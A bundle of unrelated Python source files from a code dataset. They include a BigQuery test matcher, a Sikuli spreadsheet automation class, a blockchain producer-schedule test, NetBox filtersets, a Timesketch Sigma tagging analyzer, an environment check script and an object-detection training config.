project: The name (string) of the project.
query: The query (string) to perform.
data: List of tuples with the expected data.
"""
super(BigqueryFullResultMatcher,
self).__init__(project, query, 'unused_checksum')
self.expected_data = data
self.actual_data = None
def _matches(self, _):
if self.actual_data is None:
self.actual_data = self._get_query_result()
_LOGGER.info('Result of query is: %r', self.actual_data)
try:
equal_to(self.expected_data)(self.actual_data)
return True
except BeamAssertException:
return False
def _get_query_result(self):
return self._query_with_retry()
def describe_to(self, description):
description \
.append_text("Expected data is ") \
.append_text(self.expected_data)
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Actual data is ") \
.append_text(self.actual_data)
class BigqueryFullResultStreamingMatcher(BigqueryFullResultMatcher):
"""
Matcher that verifies Bigquery data with given query.
Fetch Bigquery data with given query, compare to the expected data.
This matcher polls BigQuery until the no. of records in BigQuery is
equal to the no. of records in expected data.
A timeout can be specified.
"""
DEFAULT_TIMEOUT = 5 * 60
def __init__(self, project, query, data, timeout=DEFAULT_TIMEOUT):
super(BigqueryFullResultStreamingMatcher,
self).__init__(project, query, data)
self.timeout = timeout
def _get_query_result(self):
start_time = time.time()
while time.time() - start_time <= self.timeout:
response = self._query_with_retry()
if len(response) >= len(self.expected_data):
return response
_LOGGER.debug('Query result contains %d rows' % len(response))
time.sleep(1)
if sys.version_info >= (3, ):
raise TimeoutError('Timeout exceeded for matcher.') # noqa: F821
else:
raise RuntimeError('Timeout exceeded for matcher.')
class BigQueryTableMatcher(BaseMatcher):
"""Matcher that verifies the properties of a Table in BigQuery."""
def __init__(self, project, dataset, table, expected_properties):
if bigquery is None:
raise ImportError('Bigquery dependencies are not installed.')
self.project = project
self.dataset = dataset
self.table = table
self.expected_properties = expected_properties
@retry.with_exponential_backoff(
num_retries=MAX_RETRIES,
retry_filter=retry_on_http_timeout_and_value_error)
def _get_table_with_retry(self, bigquery_wrapper):
return bigquery_wrapper.get_table(self.project, self.dataset, self.table)
def _matches(self, _):
_LOGGER.info('Start verify Bigquery table properties.')
# Run query
bigquery_wrapper = bigquery_tools.BigQueryWrapper()
self.actual_table = self._get_table_with_retry(bigquery_wrapper)
_LOGGER.info('Table proto is %s', self.actual_table)
return all(
self._match_property(v, self._get_or_none(self.actual_table, k)) for k,
v in self.expected_properties.items())
@staticmethod
def _get_or_none(obj, attr):
try:
return obj.__getattribute__(attr)
except AttributeError:
try:
return obj.get(attr, None)
except TypeError:
return None
@staticmethod
def _match_property(expected, actual):
_LOGGER.info("Matching %s to %s", expected, actual)
if isinstance(expected, dict):
return all(
BigQueryTableMatcher._match_property(
v, BigQueryTableMatcher._get_or_none(actual, k)) for k,
v in expected.items())
else:
return expected == actual
def describe_to(self, description):
description \
.append_text("Expected table attributes are ") \
.append_text(sorted((k, v)
for k, v in self.expected_properties.items()))
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Actual table attributes are ") \
.append_text(sorted((k, self._get_or_none(self.actual_table, k))
for k in self.expected_properties))
|
the-stack_0_25164
|
# -*- coding: utf-8 -*-
"""planilha
Controla uma planilha do excel. Atualmente trabalhando
apenas com o Excel 2010.
Esta classe serve para entrada de dados, normalmente uma lista de
processos que serão trabalhados, e também para gravar o resultado
da da tarefa executada pelo robô.
Autor: Francisco A C Lima ([email protected])
"""
from sikuli import *
from tela import Tela
class Planilha(Tela):
"""Classe Planilha
Classe que controla a entrada de dados para os robôs a partir
de uma planilha, bem como o retorno da tarefa executada.
"""
aplicativo = 'Planilha'
def __init__(self):
"""Construtor da Classe
Verifica ao carregar o objeto se a planilha está aberta
"""
self.icone = "icone_plan.png"
self.imagemPadrao = "img_plan.png"
def capturarCelula(self, coluna=0):
"""captura Celula
Keyword Arguments:
coluna {number} -- número da coluna (default: {0})
Returns:
str -- texto capturado
"""
# Env.setClipboard('')
if coluna:
type(Key.HOME)
for i in range(0, coluna):
type(Key.RIGHT)
sleep(1)
type('c', KeyModifier.CTRL)
sleep(1)
texto = Env.getClipboard()
texto = texto.strip()
sleep(1)
return texto
def gravar(self):
"""grava
Grava a planilha a cada alteração
Returns:
bol -- True se a planilha foi gravada
"""
sleep(1)
type('s', KeyModifier.CTRL)
sleep(2)
return True
def retornarResultado(self, resultado):
"""retorna resultado
Retorna na planilha o resultado da análise ou tarefa executada.
Arguments:
resultado {str} -- texto de retorno
Returns:
bool -- True se o resultado for inserido
"""
self.irParaProximaCelula()
sleep(1)
# Debug.log('resultado: ' + resultado)
resultado = resultado.strip()
resultado = resultado.replace('?', '')
resultado = resultado.replace('`', '\'')
resultado = resultado.replace('/', Key.DIVIDE)
paste(resultado)
sleep(1)
return True
def irParaProximaCelula(self):
sleep(0.5)
type(Key.RIGHT)
def irParaProximaLinha(self):
type(Key.HOME)
type(Key.DOWN)
# --------------------------------------------#
# Testes da Classe Planilha #
# --------------------------------------------#
class TestesTela():
def capturaRetornaResultado(self):
planilha = Planilha()
planilha.visualizar()
texto = planilha.capturarCelula()
# texto = texto.replace('\n', '_')
print('** ' + texto + ' **')
planilha.retornarResultado(texto)
planilha.irParaProximaCelula()
# ----------------------------------------------
if __name__ == "__main__":
teste = TestesTela()
teste.capturaRetornaResultado()
|
the-stack_0_25166
|
#!/usr/bin/env python3
from testUtils import Utils
import testUtils
from Cluster import Cluster
from WalletMgr import WalletMgr
from Node import Node
from TestHelper import TestHelper
import time
import decimal
import math
import re
###############################################################
# amnod_producer_watermark_test
# --dump-error-details <Upon error print etc/amax/node_*/config.ini and var/lib/node_*/stderr.log to stdout>
# --keep-logs <Don't delete var/lib/node_* folders upon test completion>
###############################################################
def isValidBlockProducer(prodsActive, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
return False
return prodsActive[blockProducer]
def validBlockProducer(prodsActive, prodsSeen, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
Utils.cmdError("unexpected block producer %s at blockNum=%s" % (blockProducer,blockNum))
Utils.errorExit("Failed because of invalid block producer")
if not prodsActive[blockProducer]:
Utils.cmdError("block producer %s for blockNum=%s not elected, belongs to node %s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
Utils.errorExit("Failed because of incorrect block producer")
prodsSeen[blockProducer]=True
return blockProducer
def setProds(sharedProdKey):
setProdsStr='{"schedule": ['
firstTime=True
for name in ["defproducera", "shrproducera", "defproducerb", "defproducerc"]:
if firstTime:
firstTime = False
else:
setProdsStr += ','
key = cluster.defProducerAccounts[name].activePublicKey
if name == "shrproducera":
key = sharedProdKey
setProdsStr += ' { "producer_name": "%s", "block_signing_key": "%s" }' % (name, key)
setProdsStr += ' ] }'
Utils.Print("setprods: %s" % (setProdsStr))
opts="--permission amax@active"
# pylint: disable=redefined-variable-type
trans=cluster.biosNode.pushMessage("amax", "setprods", setProdsStr, opts)
if trans is None or not trans[0]:
Utils.Print("ERROR: Failed to set producer with cmd %s" % (setProdsStr))
def verifyProductionRounds(trans, node, prodsActive, rounds):
blockNum=node.getNextCleanProductionCycle(trans)
Utils.Print("Validating blockNum=%s" % (blockNum))
temp=Utils.Debug
Utils.Debug=False
Utils.Print("FIND VALID BLOCK PRODUCER")
blockProducer=node.getBlockProducerByNum(blockNum)
lastBlockProducer=blockProducer
adjust=False
while not isValidBlockProducer(prodsActive, blockNum, node):
adjust=True
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
Utils.Print("blockProducer=%s for blockNum=%s is for node=%s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
lastBlockProducer=blockProducer
blockNum+=1
Utils.Print("VALID BLOCK PRODUCER")
saw=0
sawHigh=0
startingFrom=blockNum
doPrint=0
invalidCount=0
while adjust:
invalidCount+=1
if lastBlockProducer==blockProducer:
saw+=1
else:
if saw>=12:
startingFrom=blockNum
if saw>12:
Utils.Print("ERROR!!!!!!!!!!!!!! saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
break
else:
if saw > sawHigh:
sawHigh = saw
Utils.Print("sawHigh=%s" % (sawHigh))
if doPrint < 5:
doPrint+=1
Utils.Print("saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
lastBlockProducer=blockProducer
saw=1
blockProducer=node.getBlockProducerByNum(blockNum)
blockNum+=1
if adjust:
blockNum-=1
Utils.Print("ADJUSTED %s blocks" % (invalidCount-1))
prodsSeen=None
reportFirstMissedBlock=False
Utils.Print("Verify %s complete rounds of all producers producing" % (rounds))
prodsSize = len(prodsActive)
for i in range(0, rounds):
prodsSeen={}
lastBlockProducer=None
for j in range(0, prodsSize):
# each new set of 12 blocks should have a different blockProducer
if lastBlockProducer is not None and lastBlockProducer==node.getBlockProducerByNum(blockNum):
Utils.cmdError("expected blockNum %s to be produced by any of the valid producers except %s" % (blockNum, lastBlockProducer))
Utils.errorExit("Failed because of incorrect block producer order")
# make sure that the next set of 12 blocks all have the same blockProducer
lastBlockProducer=node.getBlockProducerByNum(blockNum)
for k in range(0, 12):
blockProducer = validBlockProducer(prodsActive, prodsSeen, blockNum, node1)
if lastBlockProducer!=blockProducer:
if not reportFirstMissedBlock:
printStr=""
newBlockNum=blockNum-18
for l in range(0,36):
printStr+="%s" % (newBlockNum)
printStr+=":"
newBlockProducer=node.getBlockProducerByNum(newBlockNum)
printStr+="%s" % (newBlockProducer)
printStr+=" "
newBlockNum+=1
Utils.Print("NOTE: expected blockNum %s (started from %s) to be produced by %s, but produded by %s: round=%s, prod slot=%s, prod num=%s - %s" % (blockNum, startingFrom, lastBlockProducer, blockProducer, i, j, k, printStr))
reportFirstMissedBlock=True
break
blockNum+=1
# make sure that we have seen all 21 producers
prodsSeenKeys=prodsSeen.keys()
if len(prodsSeenKeys) != prodsSize:
Utils.cmdError("only saw %s producers of expected %d. At blockNum %s only the following producers were seen: %s" % (len(prodsSeenKeys), prodsSize, blockNum, ",".join(prodsSeenKeys)))
Utils.errorExit("Failed because of missing block producers")
Utils.Debug=temp
Print=Utils.Print
errorExit=Utils.errorExit
args = TestHelper.parse_args({"--prod-count","--dump-error-details","--keep-logs","-v","--leave-running","--clean-run",
"--wallet-port"})
Utils.Debug=args.v
totalNodes=3
cluster=Cluster(walletd=True)
dumpErrorDetails=args.dump_error_details
keepLogs=args.keep_logs
dontKill=args.leave_running
prodCount=args.prod_count
killAll=args.clean_run
walletPort=args.wallet_port
walletMgr=WalletMgr(True, port=walletPort)
testSuccessful=False
killEosInstances=not dontKill
killWallet=not dontKill
WalletdName=Utils.EosWalletName
ClientName="amcli"
try:
assert(totalNodes == 3)
TestHelper.printSystemInfo("BEGIN")
cluster.setWalletMgr(walletMgr)
cluster.killall(allInstances=killAll)
cluster.cleanup()
Print("Stand up cluster")
if cluster.launch(prodCount=prodCount, onlyBios=False, pnodes=totalNodes, totalNodes=totalNodes, totalProducers=totalNodes, useBiosBootFile=False, onlySetProds=True, sharedProducers=1) is False:
Utils.cmdError("launcher")
Utils.errorExit("Failed to stand up ama cluster.")
Print("Validating system accounts after bootstrap")
cluster.validateAccounts(None)
node0=cluster.getNode(0)
node1=cluster.getNode(1)
node2=cluster.getNode(2)
node=node0
numprod = totalNodes + 1
trans=None
prodsActive={}
prodsActive["shrproducera"] = True
prodsActive["defproducera"] = True
prodsActive["defproducerb"] = True
prodsActive["defproducerc"] = True
Print("Wait for initial schedule: defproducera(node 0) shrproducera(node 2) defproducerb(node 1) defproducerc(node 2)")
tries=10
while tries > 0:
node.infoValid = False
info = node.getInfo()
if node.infoValid and node.lastRetrievedHeadBlockProducer != "amax":
break
time.sleep(1)
tries = tries-1
if tries == 0:
Utils.errorExit("failed to wait for initial schedule")
# try to change signing key of shrproducera, shrproducera will produced by node1 instead of node2
Print("change producer signing key, shrproducera will be produced by node1 instead of node2")
shracc_node1 = cluster.defProducerAccounts["shrproducera"]
shracc_node1.activePublicKey = cluster.defProducerAccounts["defproducerb"].activePublicKey
setProds(shracc_node1.activePublicKey)
Print("sleep for 4/3 rounds...")
time.sleep(numprod * 6 * 4 / 3)
verifyProductionRounds(trans, node0, prodsActive, 1)
# change signing key of shrproducera that no one can sign
accounts = cluster.createAccountKeys(1)
Print("change producer signing key of shrproducera that none of the node has")
shracc_node1.activePublicKey = accounts[0].activePublicKey
del prodsActive["shrproducera"]
setProds(shracc_node1.activePublicKey)
Print("sleep for 4/3 rounds...")
time.sleep(numprod * 6 * 4 / 3)
verifyProductionRounds(trans, node0, prodsActive, 1)
# change signing key back to node1
Print("change producer signing key of shrproducera so that node1 can produce again")
shracc_node1.activePublicKey = cluster.defProducerAccounts["defproducerb"].activePublicKey
prodsActive["shrproducera"] = True
setProds(shracc_node1.activePublicKey)
tries=numprod * 6 * 4 # give 4 rounds
while tries > 0:
node.infoValid = False
info = node.getInfo()
if node.infoValid and node.lastRetrievedHeadBlockProducer == "shrproducera":
break
time.sleep(1)
tries = tries-1
if tries == 0:
Utils.errorExit("shrproducera failed to produce")
testSuccessful=True
finally:
TestHelper.shutdown(cluster, walletMgr, testSuccessful=testSuccessful, killEosInstances=killEosInstances, killWallet=killWallet, keepLogs=keepLogs, cleanRun=killAll, dumpErrorDetails=dumpErrorDetails)
exit(0)
|
the-stack_0_25167
|
import django_filters
from copy import deepcopy
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django_filters.exceptions import FieldLookupError
from django_filters.utils import get_model_field, resolve_field
from extras.choices import CustomFieldFilterLogicChoices
from extras.filters import TagFilter
from extras.models import CustomField
from utilities.constants import (
FILTER_CHAR_BASED_LOOKUP_MAP, FILTER_NEGATION_LOOKUP_MAP, FILTER_TREENODE_NEGATION_LOOKUP_MAP,
FILTER_NUMERIC_BASED_LOOKUP_MAP
)
from utilities.forms import MACAddressField
from utilities import filters
__all__ = (
'BaseFilterSet',
'ChangeLoggedModelFilterSet',
'NetBoxModelFilterSet',
'OrganizationalModelFilterSet',
)
#
# FilterSets
#
class BaseFilterSet(django_filters.FilterSet):
"""
A base FilterSet which provides some enhanced functionality over django-filter2's FilterSet class.
"""
FILTER_DEFAULTS = deepcopy(django_filters.filterset.FILTER_FOR_DBFIELD_DEFAULTS)
FILTER_DEFAULTS.update({
models.AutoField: {
'filter_class': filters.MultiValueNumberFilter
},
models.CharField: {
'filter_class': filters.MultiValueCharFilter
},
models.DateField: {
'filter_class': filters.MultiValueDateFilter
},
models.DateTimeField: {
'filter_class': filters.MultiValueDateTimeFilter
},
models.DecimalField: {
'filter_class': filters.MultiValueNumberFilter
},
models.EmailField: {
'filter_class': filters.MultiValueCharFilter
},
models.FloatField: {
'filter_class': filters.MultiValueNumberFilter
},
models.IntegerField: {
'filter_class': filters.MultiValueNumberFilter
},
models.PositiveIntegerField: {
'filter_class': filters.MultiValueNumberFilter
},
models.PositiveSmallIntegerField: {
'filter_class': filters.MultiValueNumberFilter
},
models.SlugField: {
'filter_class': filters.MultiValueCharFilter
},
models.SmallIntegerField: {
'filter_class': filters.MultiValueNumberFilter
},
models.TimeField: {
'filter_class': filters.MultiValueTimeFilter
},
models.URLField: {
'filter_class': filters.MultiValueCharFilter
},
MACAddressField: {
'filter_class': filters.MultiValueMACAddressFilter
},
})
@staticmethod
def _get_filter_lookup_dict(existing_filter):
# Choose the lookup expression map based on the filter type
if isinstance(existing_filter, (
django_filters.NumberFilter,
filters.MultiValueDateFilter,
filters.MultiValueDateTimeFilter,
filters.MultiValueNumberFilter,
filters.MultiValueTimeFilter
)):
return FILTER_NUMERIC_BASED_LOOKUP_MAP
elif isinstance(existing_filter, (
filters.TreeNodeMultipleChoiceFilter,
)):
# TreeNodeMultipleChoiceFilter only support negation but must maintain the `in` lookup expression
return FILTER_TREENODE_NEGATION_LOOKUP_MAP
elif isinstance(existing_filter, (
django_filters.ModelChoiceFilter,
django_filters.ModelMultipleChoiceFilter,
TagFilter
)) or existing_filter.extra.get('choices'):
# These filter types support only negation
return FILTER_NEGATION_LOOKUP_MAP
elif isinstance(existing_filter, (
django_filters.filters.CharFilter,
django_filters.MultipleChoiceFilter,
filters.MultiValueCharFilter,
filters.MultiValueMACAddressFilter
)):
return FILTER_CHAR_BASED_LOOKUP_MAP
return None
@classmethod
def get_additional_lookups(cls, existing_filter_name, existing_filter):
new_filters = {}
# Skip on abstract models
if not cls._meta.model:
return {}
# Skip nonstandard lookup expressions
if existing_filter.method is not None or existing_filter.lookup_expr not in ['exact', 'in']:
return {}
# Choose the lookup expression map based on the filter type
lookup_map = cls._get_filter_lookup_dict(existing_filter)
if lookup_map is None:
# Do not augment this filter type with more lookup expressions
return {}
# Get properties of the existing filter for later use
field_name = existing_filter.field_name
field = get_model_field(cls._meta.model, field_name)
# Create new filters for each lookup expression in the map
for lookup_name, lookup_expr in lookup_map.items():
new_filter_name = f'{existing_filter_name}__{lookup_name}'
try:
if existing_filter_name in cls.declared_filters:
# The filter field has been explicitly defined on the filterset class so we must manually
# create the new filter with the same type because there is no guarantee the defined type
# is the same as the default type for the field
resolve_field(field, lookup_expr) # Will raise FieldLookupError if the lookup is invalid
new_filter = type(existing_filter)(
field_name=field_name,
lookup_expr=lookup_expr,
label=existing_filter.label,
exclude=existing_filter.exclude,
distinct=existing_filter.distinct,
**existing_filter.extra
)
elif hasattr(existing_filter, 'custom_field'):
# Filter is for a custom field
custom_field = existing_filter.custom_field
new_filter = custom_field.to_filter(lookup_expr=lookup_expr)
else:
# The filter field is listed in Meta.fields so we can safely rely on default behaviour
# Will raise FieldLookupError if the lookup is invalid
new_filter = cls.filter_for_field(field, field_name, lookup_expr)
except FieldLookupError:
# The filter could not be created because the lookup expression is not supported on the field
continue
if lookup_name.startswith('n'):
# This is a negation filter which requires a queryset.exclude() clause
# Of course setting the negation of the existing filter's exclude attribute handles both cases
new_filter.exclude = not existing_filter.exclude
new_filters[new_filter_name] = new_filter
return new_filters
@classmethod
def get_filters(cls):
"""
Override filter generation to support dynamic lookup expressions for certain filter types.
For specific filter types, new filters are created based on defined lookup expressions in
the form `<field_name>__<lookup_expr>`
"""
filters = super().get_filters()
additional_filters = {}
for existing_filter_name, existing_filter in filters.items():
additional_filters.update(cls.get_additional_lookups(existing_filter_name, existing_filter))
filters.update(additional_filters)
return filters
class ChangeLoggedModelFilterSet(BaseFilterSet):
created = django_filters.DateTimeFilter()
created__gte = django_filters.DateTimeFilter(
field_name='created',
lookup_expr='gte'
)
created__lte = django_filters.DateTimeFilter(
field_name='created',
lookup_expr='lte'
)
last_updated = django_filters.DateTimeFilter()
last_updated__gte = django_filters.DateTimeFilter(
field_name='last_updated',
lookup_expr='gte'
)
last_updated__lte = django_filters.DateTimeFilter(
field_name='last_updated',
lookup_expr='lte'
)
class NetBoxModelFilterSet(ChangeLoggedModelFilterSet):
"""
Provides additional filtering functionality (e.g. tags, custom fields) for core NetBox models.
"""
q = django_filters.CharFilter(
method='search',
label='Search',
)
tag = TagFilter()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Dynamically add a Filter for each CustomField applicable to the parent model
custom_fields = CustomField.objects.filter(
content_types=ContentType.objects.get_for_model(self._meta.model)
).exclude(
filter_logic=CustomFieldFilterLogicChoices.FILTER_DISABLED
)
custom_field_filters = {}
for custom_field in custom_fields:
filter_name = f'cf_{custom_field.name}'
filter_instance = custom_field.to_filter()
if filter_instance:
custom_field_filters[filter_name] = filter_instance
# Add relevant additional lookups
additional_lookups = self.get_additional_lookups(filter_name, filter_instance)
custom_field_filters.update(additional_lookups)
self.filters.update(custom_field_filters)
def search(self, queryset, name, value):
"""
Override this method to apply a general-purpose search logic.
"""
return queryset
class OrganizationalModelFilterSet(NetBoxModelFilterSet):
"""
A base class for adding the search method to models which only expose the `name` and `slug` fields
"""
def search(self, queryset, name, value):
if not value.strip():
return queryset
return queryset.filter(
models.Q(name__icontains=value) |
models.Q(slug__icontains=value)
)
|
the-stack_0_25169
|
"""Index analyzer plugin for sigma."""
from __future__ import unicode_literals
import logging
from timesketch.lib.analyzers import utils
from timesketch.lib.analyzers import interface
from timesketch.lib.analyzers import manager
import timesketch.lib.sigma_util as ts_sigma_lib
logger = logging.getLogger("timesketch.analyzers.sigma_tagger")
class SigmaPlugin(interface.BaseAnalyzer):
"""Analyzer for Sigma."""
NAME = "sigma"
DISPLAY_NAME = "Sigma"
DESCRIPTION = "Run pre-defined Sigma rules and tag matching events"
def __init__(self, index_name, sketch_id, timeline_id=None, **kwargs):
"""Initialize The Sigma Analyzer.
Args:
index_name: OpenSearch index name
sketch_id: Sketch ID
timeline_id: The ID of the timeline.
"""
self.index_name = index_name
self._rule = kwargs.get("rule")
super().__init__(index_name, sketch_id, timeline_id=timeline_id)
def run_sigma_rule(
self, query, rule_name, tag_list=None, status_good=True):
"""Runs a sigma rule and applies the appropriate tags.
Args:
query: OpenSearch search query for events to tag.
rule_name: rule_name to apply to matching events.
tag_list: a list of additional tags to be added to the event(s)
status_good (bool): rule status based on the sigma_rule_status csv
Returns:
int: number of events tagged.
"""
if not tag_list:
tag_list = []
return_fields = []
tagged_events_counter = 0
events = self.event_stream(
query_string=query, return_fields=return_fields
)
for event in events:
ts_sigma_rules = event.source.get("ts_sigma_rule", [])
ts_sigma_rules.append(rule_name)
event.add_attributes({"ts_sigma_rule": list(set(ts_sigma_rules))})
if status_good:
ts_ttp = event.source.get("ts_ttp", [])
special_tags = []
for tag in tag_list:
# Special handling for sigma tags that TS considers TTPs
# https://car.mitre.org and https://attack.mitre.org
if tag.startswith(("attack.", "car.")):
ts_ttp.append(tag)
special_tags.append(tag)
# add the remaining tags as plain tags
tags_to_add = list(set(tag_list) - set(special_tags))
event.add_tags(tags_to_add)
if len(ts_ttp) > 0:
event.add_attributes({"ts_ttp": list(set(ts_ttp))})
event.commit()
tagged_events_counter += 1
return tagged_events_counter
def run(self):
"""Entry point for the analyzer.
Returns:
String with summary of the analyzer result.
"""
tags_applied = {}
sigma_rule_counter = 0
tagged_events_counter = 0
rule = self._rule
if not rule:
logger.error("No Sigma rule given.")
return "Unable to run, no rule given to the analyzer"
rule_name = rule.get("title", "N/A")
problem_strings = []
output_strings = []
tags_applied[rule.get("file_name")] = 0
try:
sigma_rule_counter += 1
tagged_events_counter = self.run_sigma_rule(
rule.get("es_query"),
rule.get("file_name"),
tag_list=rule.get("tags"),
status_good=rule.get('ts_use_in_analyzer'),
)
tags_applied[rule.get("file_name")] += tagged_events_counter
except: # pylint: disable=bare-except
logger.error(
"Problem with rule in file {0:s}: ".format(
rule.get("file_name")
),
exc_info=True,
)
problem_strings.append("* {0:s}".format(rule.get("file_name")))
output_strings.append(
f"{tagged_events_counter} events tagged for rule [{rule_name}]"
)
if len(problem_strings) > 0:
output_strings.append("Problematic rules:")
output_strings.extend(problem_strings)
return "\n".join(output_strings)
def add_sigma_match_view(self, sigma_rule_counter):
"""Adds a view with the top 20 matching rules.
Args:
sigma_rule_counter number of matching rules
"""
view = self.sketch.add_view(
view_name="Sigma Rule matches",
analyzer_name=self.NAME,
query_string='tag:"sigma*"',
)
agg_params = {
"field": "tag",
"limit": 20,
"index": [self.timeline_id],
}
agg_obj = self.sketch.add_aggregation(
name="Top 20 Sigma tags",
agg_name="field_bucket",
agg_params=agg_params,
view_id=view.id,
chart_type="hbarchart",
description="Created by the Sigma analyzer",
)
story = self.sketch.add_story("Sigma Rule hits")
story.add_text(utils.SIGMA_STORY_HEADER, skip_if_exists=True)
story.add_text(
"## Sigma Analyzer.\n\nThe Sigma "
"analyzer takes Events and matches them with Sigma rules."
"In this timeline the analyzer discovered {0:d} "
"Sigma tags.\n\nThis is a summary of "
"it's findings.".format(sigma_rule_counter)
)
story.add_text("The top 20 most commonly discovered tags were:")
story.add_aggregation(agg_obj)
story.add_text("And an overview of all the discovered search terms:")
story.add_view(view)
@staticmethod
def get_kwargs():
"""Returns an array of all rules of Timesketch.
Returns:
sigma_rules All Sigma rules
"""
sigma_rules = []
for rule in ts_sigma_lib.get_all_sigma_rules():
sigma_rules.append({"rule": rule})
return sigma_rules
class RulesSigmaPlugin(SigmaPlugin):
"""Sigma plugin to run rules."""
NAME = "sigma"
manager.AnalysisManager.register_analyzer(RulesSigmaPlugin)
|
the-stack_0_25170
|
# Authors: Amit Kapoor and Bargava Subramanian
# Copyright (c) 2016 Amit Kapoor
# License: MIT License
"""
This script will check if the environment setup is correct for the workshop.
To run, please execute the following command from the command prompt
>>> python check_env.py
The output will indicate if any of the libraries are missing or need to be updated.
This script is inspired from https://github.com/fonnesbeck/scipy2015_tutorial/blob/master/check_env.py
"""
from __future__ import print_function
try:
import curses
curses.setupterm()
assert curses.tigetnum("colors") > 2
OK = "\x1b[1;%dm[ OK ]\x1b[0m" % (30 + curses.COLOR_GREEN)
FAIL = "\x1b[1;%dm[FAIL]\x1b[0m" % (30 + curses.COLOR_RED)
except:
OK = '[ OK ]'
FAIL = '[FAIL]'
import sys
try:
import importlib
except ImportError:
print(FAIL, "Python version 2.7 is required, but %s is installed." % sys.version)
from distutils.version import LooseVersion as Version
def import_version(pkg, min_ver, fail_msg=""):
mod = None
try:
mod = importlib.import_module(pkg)
if((pkg=="spacy" or pkg=="wordcloud") and (mod > 0)):
print(OK, '%s ' % (pkg))
else:
#else:
version = getattr(mod, "__version__", 0) or getattr(mod, "VERSION", 0)
if Version(version) < min_ver:
print(FAIL, "%s version %s or higher required, but %s installed."
% (lib, min_ver, version))
else:
print(OK, '%s version %s' % (pkg, version))
except ImportError:
print(FAIL, '%s not installed. %s' % (pkg, fail_msg))
return mod
# first check the python version
print('Using python in', sys.prefix)
print(sys.version)
pyversion = Version(sys.version)
if pyversion < "3":
print(FAIL, "Python version 3 is required, but %s is installed." % sys.version)
elif pyversion >= "2":
if pyversion == "2.7":
print(FAIL, "Python version 2.7 is installed. Please upgrade to version 3." )
else:
print(FAIL, "Unknown Python version: %s" % sys.version)
print()
requirements = {
'IPython' : '4.0.3',
'jupyter' :'1.0.0',
'matplotlib' :'1.5.0',
'numpy' : '1.10.4',
'pandas' : '0.17.1',
'scipy' : '0.17.0',
'sklearn' : '0.17',
'seaborn' :'0.6.0',
'statsmodels':'0.6.1'
}
# now the dependencies
for lib, required_version in list(requirements.items()):
import_version(lib, required_version)
|
the-stack_0_25173
|
# model settings
model = dict(
type='TTFNet',
pretrained='modelzoo://resnet18',
backbone=dict(
type='ResNet',
depth=18,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_eval=False,
style='pytorch'),
neck=None,
bbox_head=dict(
type='TTFLevelHead',
inplanes=(64, 128, 256, 512),
planes=(256, 128, 64),
down_ratio_b1=8,
down_ratio_b2=4,
hm_head_channels=(128, 64),
wh_head_channels=(32, 32),
hm_head_conv_num=(2, 2),
wh_head_conv_num=(3, 3),
num_classes=81,
wh_scale_factor_b1=16.,
wh_scale_factor_b2=8.,
shortcut_cfg=(1, 2, 3),
alpha=0.6,
beta=0.6,
max_objs=128,
hm_weight_b1=1.,
wh_weight_b1=5.,
hm_weight_b2=1.,
wh_weight_b2=5.,
b1_min_length=64,
b2_max_length=64,
mdcn_before_s8=True,
inf_branch=['b1', 'b2'],
use_simple_nms=True,
conv_cfg=None,
norm_cfg=dict(type='BN')))
cudnn_benchmark = True
# training and testing settings
train_cfg = dict(debug=False)
test_cfg = dict(score_thr=0.01, max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(512, 512), keep_ratio=False),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(512, 512),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=False),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=16,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(
type='SGD',
lr=0.002,
momentum=0.9,
weight_decay=0.0004,
paramwise_options=dict(bias_lr_mult=2., bias_decay_mult=0.))
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 5,
step=[9, 11])
checkpoint_config = dict(save_every_n_steps=200, max_to_keep=1, keep_every_n_epochs=9)
# yapf:disable
log_config = dict(interval=20)
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/ttfv2net_r18_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
the-stack_0_25176
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
